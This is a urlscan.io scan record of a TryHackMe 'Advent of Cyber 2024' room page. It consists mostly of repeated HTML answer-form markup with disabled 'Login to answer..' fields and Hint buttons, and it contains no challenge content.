tryhackme.com
Open in
urlscan Pro
2606:4700:10::ac43:1b0a
Public Scan
Submitted URL: https://e.customeriomail.com/e/c/eyJlbWFpbF9pZCI6ImRnVEsxUVVEQU5DZ0M4LWdDd0dUWW95bzN0Q0dMNWZVUm40S0lqZz0iLCJocmVmIjoiaHR0cHM6...
Effective URL: https://tryhackme.com/r/room/adventofcyber2024?reveal=share
Submission: On December 07 via manual from BR — Scanned from CA
Effective URL: https://tryhackme.com/r/room/adventofcyber2024?reveal=share
Submission: On December 07 via manual from BR — Scanned from CA
Form analysis 53 forms found in the DOM
<form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="7" name="7" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="8" name="8" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
